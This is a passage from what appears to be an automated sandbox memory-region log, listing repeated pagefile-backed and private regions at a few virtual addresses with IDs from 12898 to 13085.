"pagefile_0x0000000000530000" filename = "" Region: id = 12898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12907 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12908 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12909 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12911 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12912 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12913 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12914 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12915 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12916 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12917 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12918 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12919 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12920 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12921 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12922 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12923 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12924 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12925 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12926 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12927 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12928 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12929 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12930 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12931 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12932 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12933 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12934 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12935 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12936 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12937 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12938 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12939 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12940 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12941 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12942 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12943 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12944 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12945 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12946 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12947 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12948 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12949 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12950 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12951 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12952 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12953 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12954 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12955 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12956 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12957 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12958 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12959 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12960 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12961 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12963 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12964 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12965 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12966 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12967 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12969 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12970 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12973 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12974 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12977 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12978 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12979 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12980 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12981 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12984 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12985 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12986 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12987 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12988 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12990 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12991 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12992 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12993 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12994 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12995 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12996 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12997 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12998 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12999 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13000 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13001 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13002 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13003 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13004 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13005 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13006 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13007 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13008 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13009 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13010 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13011 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13012 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13013 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13014 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13015 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13016 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13017 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13018 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13019 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13020 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13021 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13022 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13023 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13024 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13025 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13026 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13027 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13028 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13029 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13030 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13031 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13032 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13033 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13034 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13035 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13036 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13037 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13038 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13039 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13040 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13041 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13042 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13043 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13044 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13045 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13046 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13047 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13048 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13049 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13050 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13051 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13052 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13053 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13054 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13055 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13056 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13057 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13058 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13059 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13060 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13061 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13062 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13063 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13064 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13065 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13066 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13067 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13068 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13069 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13070 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13071 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13072 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13073 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13074 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13075 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13076 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13077 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13078 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13079 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13080 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13081 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13082 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13083 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13084 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13085 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 